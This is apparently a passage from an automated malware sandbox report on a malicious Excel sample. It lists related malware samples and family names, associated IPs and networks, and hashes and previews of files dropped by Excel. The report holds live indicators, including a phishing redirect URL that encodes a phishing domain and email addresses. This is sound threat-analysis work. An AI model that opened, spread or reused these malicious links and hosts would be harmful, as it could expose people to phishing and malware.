          BG75-10-01_CurrencyTransfer__530_24_00002559_Processed.xlsGet hashmaliciousUnknownBrowse
          • 13.107.246.63
          JIKJCBEX.exeGet hashmaliciousLummaCBrowse
          • 13.107.246.63
          LKKWDUFD.exeGet hashmaliciousUnknownBrowse
          • 13.107.246.63
          KjECqzXLWp.lnkGet hashmaliciousRHADAMANTHYSBrowse
          • 13.107.246.63
          cey4VIyGKh.lnkGet hashmaliciousRHADAMANTHYSBrowse
          • 13.107.246.63
          NHnfqsj0C4.exeGet hashmaliciousAmadeyBrowse
          • 13.107.246.63
          dZKPE9gotO.exeGet hashmaliciousVidarBrowse
          • 13.107.246.63
          bg.microsoft.map.fastly.netSample_Order_000000991.xlsGet hashmaliciousUnknownBrowse
          • 199.232.210.172
          InvoiceNr274728.pdf.lnkGet hashmaliciousLummaCBrowse
          • 199.232.210.172
          PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
          • 199.232.210.172
          HA9wRLGT9y.exeGet hashmaliciousUnknownBrowse
          • 199.232.214.172
          8Bd1K3FM7v.exeGet hashmaliciousLummaCBrowse
          • 199.232.214.172
          Statement Of Account - (USD 19,490.00 ).xlsGet hashmaliciousUnknownBrowse
          • 199.232.214.172
          A6IuJ5NneS.lnkGet hashmaliciousLummaCBrowse
          • 199.232.210.172
          jignesh.exeGet hashmaliciousQuasarBrowse
          • 199.232.214.172
          skibidi.exeGet hashmaliciousQuasarBrowse
          • 199.232.214.172
          vanilla.exeGet hashmaliciousQuasarBrowse
          • 199.232.214.172
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          3LCLOUDINTERNETSERVICESLTDA-EPPBRSmple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          Sample_Order_000000991.xlsGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          BG75-10-01_CurrencyTransfer__530_24_00002559_Processed.xlsGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          Sample_Order_000000991.xlsGet hashmaliciousUnknownBrowse
          • 170.82.173.30
          BG75-10-01_CurrencyTransfer__530_24_00002559_Processed.xlsGet hashmaliciousUnknownBrowse
          • 170.82.173.30
          Payment_swift_copy.xlsGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          Statement Of Account - (USD 19,490.00 ).xlsGet hashmaliciousUnknownBrowse
          • 170.82.173.30
          Payment_swift_copy.xlsGet hashmaliciousUnknownBrowse
          • 170.82.173.30
          AS-COLOCROSSINGUSSmple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
          • 192.3.179.166
          Sample_Order_000000991.xlsGet hashmaliciousUnknownBrowse
          • 192.3.179.166
          Sample_Order_000000991.xlsGet hashmaliciousUnknownBrowse
          • 192.3.179.166
          Payment_swift_copy.xlsGet hashmaliciousUnknownBrowse
          • 192.3.122.159
          Statement Of Account - (USD 19,490.00 ).xlsGet hashmaliciousUnknownBrowse
          • 23.95.235.29
          Payment_swift_copy.xlsGet hashmaliciousUnknownBrowse
          • 192.3.122.159
          Statement Of Account - (USD 19,490.00 ).xlsGet hashmaliciousUnknownBrowse
          • 23.95.235.29
          Statement Of Account - (USD 19,490.00 ).xlsGet hashmaliciousUnknownBrowse
          • 23.95.235.29
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          6271f898ce5be7dd52b0fc260d0662b3Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          Sample_Order_000000991.xlsGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          BG75-10-01_CurrencyTransfer__530_24_00002559_Processed.xlsGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
          • 170.82.174.30
          Payment_swift_copy.xlsGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          Statement Of Account - (USD 19,490.00 ).xlsGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          Statement Of Account - (USD 19,490.00 ).xlsGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          Payment_swift_copy.xlsGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          https://go.eu.sparkpostmail1.com/f/a/IgPiUnQgGsgttR90IQc-hw~~/AAGCxAA~/RgRpOpvrP0QqaHR0cHM6Ly9tYXNzd29vZHBvbGlzaC5pbi93YXRlci9jb2xkL2luZGV4VwVzcGNldUIKZ1XrFlhnca8zKlISemFyZ2FyQGZhcmlkZWEuY29tWAQAAAAB#YmlsbC5ob2l0dEBwYXJ0bmVyc21ndS5jb20=Get hashmaliciousHTMLPhisherBrowse
          • 170.82.174.30
          No context
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
          Category:dropped
          Size (bytes):118
          Entropy (8bit):3.5700810731231707
          Encrypted:false
          SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
          MD5:573220372DA4ED487441611079B623CD
          SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
          SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
          SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
          Malicious:false
          Reputation:high, very likely benign file
          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4761 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
          Category:dropped
          Size (bytes):4761
          Entropy (8bit):7.945585251880973
          Encrypted:false
          SSDEEP:96:6ZUpZsm0HwZ8FLSeXs+aiL9qcZ7KtlAD1GlNHgdkVI5F11AcNmwkVFzGz6ENhZC7:62T0QOLl8vAqcZ7K3AUNAdx5FAx9VEOj
          MD5:77B20B5CD41BC6BB475CCA3F91AE6E3C
          SHA1:9E98ACE72BD2AB931341427A856EF4CEA6FAF806
          SHA-256:5511A9B9F9144ED7BDE4CCB074733B7C564D918D2A8B10D391AFC6BE5B3B1509
          SHA-512:3537DA5E7F3ABA3DAFE6A86E9511ABA20B7A3D34F30AEA6CC11FEEF7768BD63C0C85679C49E99C3291BD1B552DED2C6973B6C2F7F6D731BCFACECAB218E72FD4
          Malicious:false
          Reputation:moderate, very likely benign file
          Preview:MSCF............,...................O..................YWP .disallowedcert.stl.lJ..B...CK.wTS.....{.&Uz.I."E".HS@. .P.!.....*E. .DQ..... EDA.H. E..""/.s<.s.9.....&#.{~k.VV..7@......b.R....MdT..B.L..%.C......" ....%.4%..%*.B..T.d...S.....pem..$....&.q.`.+...E..C.....$.|.A.!~d.H>w%S$...QC't..;..<..R@....2. .l..?..c..A....Ew...l..K$.. ~...'......Mt^c..s.Y%..}......h......m....h.......~d...,...=ge3.....2%..(...T..!].....!C~.X..MHU.o[.z].Y...&lXG;uW.:...2!..][\/.G..]6#.I...S..#F.X.k.j.....)Nc.].t^.-l.Y...4?.b...rY....A......7.D.H\.R...s.L,.6.*|.....VQ....<.*.......... [Z....].N0LU.X........6..C\....F.....KbZ..^=.@.B..MyH...%.2.>...]..E.....sZ.f..3z.].Y.t.d$.....P...,. .~..mNZ[PL.<....d..+...l.-...b.^....6F..z.&.;D.._..c."...d..... k9....60?&..Y.v.dgu...{.....{..d=..$......@^..qA..*uJ..@W.V..eC..AV.e+21...N.{.]..]..f]..`Z.....]2.....x..f..K...t. ...e.V.U.$PV..@6W\_nsm.n.........A<.......d....@f..Z... >R..k.....8..Y....E>..2o7..........c..K7n....
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):340
          Entropy (8bit):3.262470744919491
          Encrypted:false
          SSDEEP:6:kKAM5+7DNfUN+SkQlPlEGYRMY9z+s3Ql2DUeXJlOW1:GLkPlE99SCQl2DUeXJlOA
          MD5:D4460FC2DB7F6CB60A8BF6B27FB7E318
          SHA1:4533ED515A618E53EFBD5C0D7932679AB5F69D14
          SHA-256:B3A0274236751158EDCA0624617972F537E49D3264CD971CE626B93A1A4174AE
          SHA-512:DE79A85BFECE45D802ED1160A049646D61ED89C413FF7D4FD99A264137458EBFD2DEA619A5049A838A586864668C726DB64150D1077E6100A86DA17C9CA52C2D
          Malicious:false
          Reputation:low
          Preview:p...... .........9...O..(....................................................... ........~..MG......&.....6.........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".0.6.c.f.c.c.5.4.d.4.7.d.b.1.:.0."...
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):784
          Entropy (8bit):2.7137690747287806
          Encrypted:false
          SSDEEP:24:YIrNvpKAzLRwcfHGF8AJp9WtAZRJ5poIHWI:YmbfzLmc88AJtfJ52IHV
          MD5:09F73B3902CD3D88E04312787956B654
          SHA1:A6C275F1A65DB02D8A752C614C27E88326447C41
          SHA-256:72971990E5DC57AC8F4F27701158F6DC16E235814EA17DECA95E59CF5F60BC26
          SHA-512:6A68530BA4D4413B587E340CF871162036B6AC60AC0F969C07C70967C3102ADDE3C895BA6F1E2590D9D0C98C253ADFA33CA84E65106C3B56F506FE0E06F0ADA9
          Malicious:false
          Preview:3.7.4.6.3.7.6.,.1.1.9.6.3.7.8.,.1.7.8.8.6.5.8.,.2.5.5.0.5.0.8.8.,.1.2.5.,.1.1.9.,.3.0.0.4.9.2.6.8.,.;.3.2.9.4.5.8.7.9.9.,.3.7.4.6.3.7.8.,.6.3.6.4.3.3.4.,.3.0.1.5.3.7.2.1.,.2.3.7.1.6.5.1.,.6.5.4.0.2.1.5.,.2.4.6.0.9.2.5.8.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.2.7.1.5.3.4.9.7.,.6.3.7.1.6.9.4.,.5.9.2.2.3.4.2.3.,.5.7.9.9.9.6.6.1.,.1.5.6.1.9.5.8.,.6.3.0.6.3.0.9.9.,.2.7.3.6.0.0.9.5.,.5.8.4.2.5.8.6.0.,.6.3.6.4.3.3.7.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.0.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.3.,.1.0.6.9.5.5.2.,.1.6.5.7.4.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.3.5.2.5.8.7.,.1.7.7.1.6.5.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.3.2.0.5.9.2.7.6.7.,.
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):44256
          Entropy (8bit):3.15066292565687
          Encrypted:false
          SSDEEP:384:IhpMW5NFNimpUIuOjwTsiyGGiugBhUErpxTORe4tyIWY5:BWzi+8+GGidBhUErpxTORe4tyI9
          MD5:F1EC2E98B0F577B675156B13DCF94105
          SHA1:4FF2D02051E92771FBB245BA8095C80148A0F61A
          SHA-256:66AFB9C12E20A08F9A713C366EDE8A9CD8F4A93B7D7BFC76205013C28A3250E9
          SHA-512:6E442DB49BF2A429AD2CA7CB3804D79791C1E1FEB414F69FDDD58042E98C5AA5BFC1C751713DB76DD58DC9F3CAC3A7C491228797A909F8FD0291048E8F2FC9BE
          Malicious:false
          Preview:....l................................ .. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........................m...-...!..............?...........?................................R...p.................................. A.r.i.a.l...............................................
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):98872
          Entropy (8bit):2.6157611264964986
          Encrypted:false
          SSDEEP:768:XOWIyvab1DW7ohBb66mQK4BTonxqQbApQKyE:+FQE
          MD5:CCDB54147CFB963D4D6111679F9B36C1
          SHA1:4CDF62F1CBFBD63EDD3FCF921C4499F990B20B4D
          SHA-256:BE7166794C2E511D5095328995677325A7B17A17BCED552128723161F3CA7BBF
          SHA-512:AF3016440D9B8C6A8A65E99EDF67F27039DC94BAAC1670DBB223360BB54BDCA917F00027F8A87BA12EEDD60DF89347BFEE9F85DBB155588AC62473D863F5B7ED
          Malicious:false
          Preview:....l............................}...... EMF....8...g...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):99352
          Entropy (8bit):2.665804695101472
          Encrypted:false
          SSDEEP:768:hOCkcob0vaPLK1DW7ohBb66mWK4BToO4qQbApQKyE:UChobDuqE
          MD5:515FCB8E854BD1BC78B4D44774BEE805
          SHA1:35C0C8572812B6BD505DBB30CF416857ED4AAF90
          SHA-256:DD13470969AFDEEED2E954394B6F59141DB153786F221F63118987C9A4EF21CF
          SHA-512:C45DF002D9BE7DBC072D7B68FE6BF13AABB4A108EAF94B418FB1887F39770B81944F4DE549C4C0FD17AED653B633A0CF6CFCD9C1C92EAA5B9CBDD3000AF56655
          Malicious:false
          Preview:....l............................}...... EMF....................................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):98872
          Entropy (8bit):2.6157611264964986
          Encrypted:false
          SSDEEP:768:XOWIyvab1DW7ohBb66mQK4BTonxqQbApQKyE:+FQE
          MD5:CCDB54147CFB963D4D6111679F9B36C1
          SHA1:4CDF62F1CBFBD63EDD3FCF921C4499F990B20B4D
          SHA-256:BE7166794C2E511D5095328995677325A7B17A17BCED552128723161F3CA7BBF
          SHA-512:AF3016440D9B8C6A8A65E99EDF67F27039DC94BAAC1670DBB223360BB54BDCA917F00027F8A87BA12EEDD60DF89347BFEE9F85DBB155588AC62473D863F5B7ED
          Malicious:false
          Preview:....l............................}...... EMF....8...g...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):8184
          Entropy (8bit):2.4203401081598845
          Encrypted:false
          SSDEEP:96:EV5g2s88nDRjgRMp/I5i9+WZBKlA+B79YIRdMZgmR7qii1BoFV:EaR0RMCfWZ4F79RdGgmR7qii1BY
          MD5:7CAF2CA6709CCA1E5FF8682EA0D6D2AE
          SHA1:633AC44AFCB469650E3C9E4DB6D4F837F3E948DB
          SHA-256:12C3C00DED9ABFBC3D8EE10393E0153DBE460A76D2F0ABB1860ACEEE326EF639
          SHA-512:92FB773FAE1CB3817E4D37E68A33748F31B506CFF0411C03A4E26ED27F1FDCEB79C40924C6CD425920CF5CBA2CF30B8A06086DF02CAF5C92A6CBD6293FF18BC1
          Malicious:false
          Preview:....l...........{...U............A...... EMF....................................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!...............................................|...V...K..............."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V...'.......................%...................................L...d...h...............h.......X.......!..............?...........?................................R...p...................................A.r.i.a.l...............
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):149960
          Entropy (8bit):2.8058488863252715
          Encrypted:false
          SSDEEP:1536:oHz9kFzF1ENUAI8DHW/97p8/JYbhaEUbN8AF:9dUF
          MD5:5026E23C3B57062D21D6241AF8E69FC4
          SHA1:E2D5380575D30E8AEF762D9DD861CA68C0E2D8AC
          SHA-256:2E1D7BBE8BFB169EFD95A3DC554A70D59B8F540CDF874B9F2D080A7F47315211
          SHA-512:7A38140ACB712B06C936ABD0940EEF7E10F498288B64E02D62838B5257245BAB648B72E95B59D3FB0396E25C70713A4D3D65F5F0C8E3C6880D3B628084917630
          Malicious:false
          Preview:....l...........................Z....G.. EMF.....I..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n.....................................o....v....)....U...........`A....(.......0....7...9..............0\o...v0...........9...0.......\o..X*l`....\o...Z.
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):153132
          Entropy (8bit):2.7610761527595487
          Encrypted:false
          SSDEEP:1536:XAtyjRnXkRMamXUv6INHOqXbk0WYqEkR6VJ6:PER6
          MD5:EA23AEC91C8E07F9788C80B75AC55975
          SHA1:6A05FC01403072828CF994BD0D23CAB571258A39
          SHA-256:FE950A148BBE8AC74C3C23630C297446822BEFF2E89B7E50AED97B09B8C93A3C
          SHA-512:81C3F440C9255B4D8D6E8650D723D5288CBC2E985B4951A190E3C479FC867840F5928CF7D150C748E135B729DD187511C823E63C45415377210CBCB766EAD068
          Malicious:false
          Preview:....l...........................Z....G.. EMF....,V..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................&...........................%...........................6.......#.......&...........................%...........L...d...........".......................!...........
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):8184
          Entropy (8bit):2.4203401081598845
          Encrypted:false
          SSDEEP:96:EV5g2s88nDRjgRMp/I5i9+WZBKlA+B79YIRdMZgmR7qii1BoFV:EaR0RMCfWZ4F79RdGgmR7qii1BY
          MD5:7CAF2CA6709CCA1E5FF8682EA0D6D2AE
          SHA1:633AC44AFCB469650E3C9E4DB6D4F837F3E948DB
          SHA-256:12C3C00DED9ABFBC3D8EE10393E0153DBE460A76D2F0ABB1860ACEEE326EF639
          SHA-512:92FB773FAE1CB3817E4D37E68A33748F31B506CFF0411C03A4E26ED27F1FDCEB79C40924C6CD425920CF5CBA2CF30B8A06086DF02CAF5C92A6CBD6293FF18BC1
          Malicious:false
          Preview:....l...........{...U............A...... EMF....................................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!...............................................|...V...K..............."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V...'.......................%...................................L...d...h...............h.......X.......!..............?...........?................................R...p...................................A.r.i.a.l...............
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):8208
          Entropy (8bit):2.5121029617635515
          Encrypted:false
          SSDEEP:96:Eeg2s88nDdDAgZOXMr5z9nWZBHA+B79YIRdMZgmR7qii1BoFV:E/dRxWZx79RdGgmR7qii1BY
          MD5:1A6C323C1CAF9544DE598B86E3C4227E
          SHA1:BA7B652FD056CD01EE96321081D6E6539F2D552E
          SHA-256:49456274D940C3BAD20C1286D2F9D68A577C15746C5B12C05833862D9CEA921D
          SHA-512:08A4A6954CF713EEFB1D580CD4BB4251EB37E949BC4DA0B99BEA8C254F65DB8919B04995913F9A2C437001053893C7B2780540F957B9FFAAF4431DA080F561A7
          Malicious:false
          Preview:....l...........{...U............A...... EMF..... ..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!...............................................|...V...K..............."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V...'.......................%...................................L...d...h...............h.......X.......!..............?...........?................................R...p...................................A.r.i.a.l...............
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):98872
          Entropy (8bit):2.669751860358794
          Encrypted:false
          SSDEEP:768:XOC08IGrva5a1DN7ohc46A7+KFBToDSQbApQK0E:+CRIH5mDE
          MD5:40BA8E4246E836B4EEEBEAD4A0283585
          SHA1:72D78AA4F4F0ED3784C7B52D0F3C804B98976886
          SHA-256:5386F961BEE790975F589F22D68E948918E497119BAB7A2419A9E493CFC178BD
          SHA-512:38299FC859EEC263AB145E5172BB43AE3F78A74CCE3BB8AEC1805F2FF6D4EB6C583B5E126B18711D3F4AADE0C2099848C6115A1D1913C2D71C41B6869621AD21
          Malicious:false
          Preview:....l............................}...... EMF....8...g...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):150296
          Entropy (8bit):2.801102239716557
          Encrypted:false
          SSDEEP:1536:ZhX4FSy61ENUAI8DHW/97p8/JYbhaEUbNLnqrOHBGsdl:vtkD
          MD5:669B4679084CE9FCC7389D53EA1CD2C1
          SHA1:7ACB77D5C9F46A7D3D680BA9DE81D9A308651011
          SHA-256:6DD4449619C1A35DBE9558001BD4BD7BBF7018A0D433B23CBEC415C82BC31C9F
          SHA-512:A5331FF8161130EF47390E1227CB9BB2F4CC600D37D6A1EF0D69AE49566AC1A35EBC1DE67D033D070138F149944360A68D6766AD58AE0ED63736E30616604617
          Malicious:false
          Preview:....l...........................Z....G.. EMF.....K..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n.....................................o....v....)....U...........`A....(.......0....7...9..............0\o...v0...........9...0.......\o..X*l`....\o...Z.
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):44256
          Entropy (8bit):3.147465798679962
          Encrypted:false
          SSDEEP:384:j1W5NF0vUXfOjwTsiyGGiugBhUErpxTORe4tyJ2c:ZWYW+GGidBhUErpxTORe4ty5
          MD5:36D8FF25D14E7E2FBB1968E952FF9C17
          SHA1:E3BD7140DA6CAD87C5A1D5417DFBDD7B0E67B110
          SHA-256:305DCBFBEB9FFEE587E061D779CA1DDF31939ECD64EEE7D8A22BA9D640B48633
          SHA-512:B4B753222F617F78B36949BD9F37E13D68D9FD7367484BEE799F0D7AE38E1705E997A6409251BC2B9830012536FBD08C3C6CB7411D9122F939833F38E303DCBF
          Malicious:false
          Preview:....l................................ .. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........................m...-...!..............?...........?................................R...p.................................. A.r.i.a.l...............................................
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):134544
          Entropy (8bit):2.9527588414114754
          Encrypted:false
          SSDEEP:768:P0WYNNkN2HtS1u40TiTKAvGNLnvfKx4t1cEU9W3V/DOEsx:pYN/Ni0TiTKeYjfKx4tCEU9W35psx
          MD5:83F48FDD46D3424E92E24E709EAB5960
          SHA1:6CEE65663B48B56BDFF6756C38C1F4190EAC6E12
          SHA-256:77F4BCE7FBE1E2F98A04DC51994467460B255135535CDE954EEE8180F500C6AE
          SHA-512:8F781049001FC063EDB9B4352C0EA05D8DA9DCFC599234A58258C6FB4C4CED2B862A701081F10B68E286124413AD04F4AAAB485D376B0A2FB04167AFF121F47E
          Malicious:false
          Preview:....l...............e............n...=.. EMF........6.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f...R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n........................................................@...............8/....X.....8/........................X...................N.8/@....y8/.....m8/|...............|.....................8/.................8/
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):8184
          Entropy (8bit):2.5091980865060792
          Encrypted:false
          SSDEEP:96:EV5g2s88nDdDAgZOX5do5L9jWZBKlA+B79YIRdMZgmR7qii1BoFV:EadhJWZ4F79RdGgmR7qii1BY
          MD5:98BE65C3173A640BFF174598C7B1A6CC
          SHA1:8D8CF8D91EFD152874549261E9C5674CD321B7E0
          SHA-256:A44C250C68C8165FFBA3D62E77F66B27F1A89B83B72D7528ECCA5C39E4D2A2FC
          SHA-512:4212A6AAE4A834C68A597A7729197C28CBEA589C06FB9AAFDD00DCE0DDA51366CFF91DB8B4AFB03A428A3CD62DEEE9007837A0356EF14BF8C4091BB0D6D2ECDD
          Malicious:false
          Preview:....l...........{...U............A...... EMF....................................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!...............................................|...V...K..............."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V...'.......................%...................................L...d...h...............h.......X.......!..............?...........?................................R...p...................................A.r.i.a.l...............
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):153132
          Entropy (8bit):2.7610761527595487
          Encrypted:false
          SSDEEP:1536:XAtyjRnXkRMamXUv6INHOqXbk0WYqEkR6VJ6:PER6
          MD5:EA23AEC91C8E07F9788C80B75AC55975
          SHA1:6A05FC01403072828CF994BD0D23CAB571258A39
          SHA-256:FE950A148BBE8AC74C3C23630C297446822BEFF2E89B7E50AED97B09B8C93A3C
          SHA-512:81C3F440C9255B4D8D6E8650D723D5288CBC2E985B4951A190E3C479FC867840F5928CF7D150C748E135B729DD187511C823E63C45415377210CBCB766EAD068
          Malicious:false
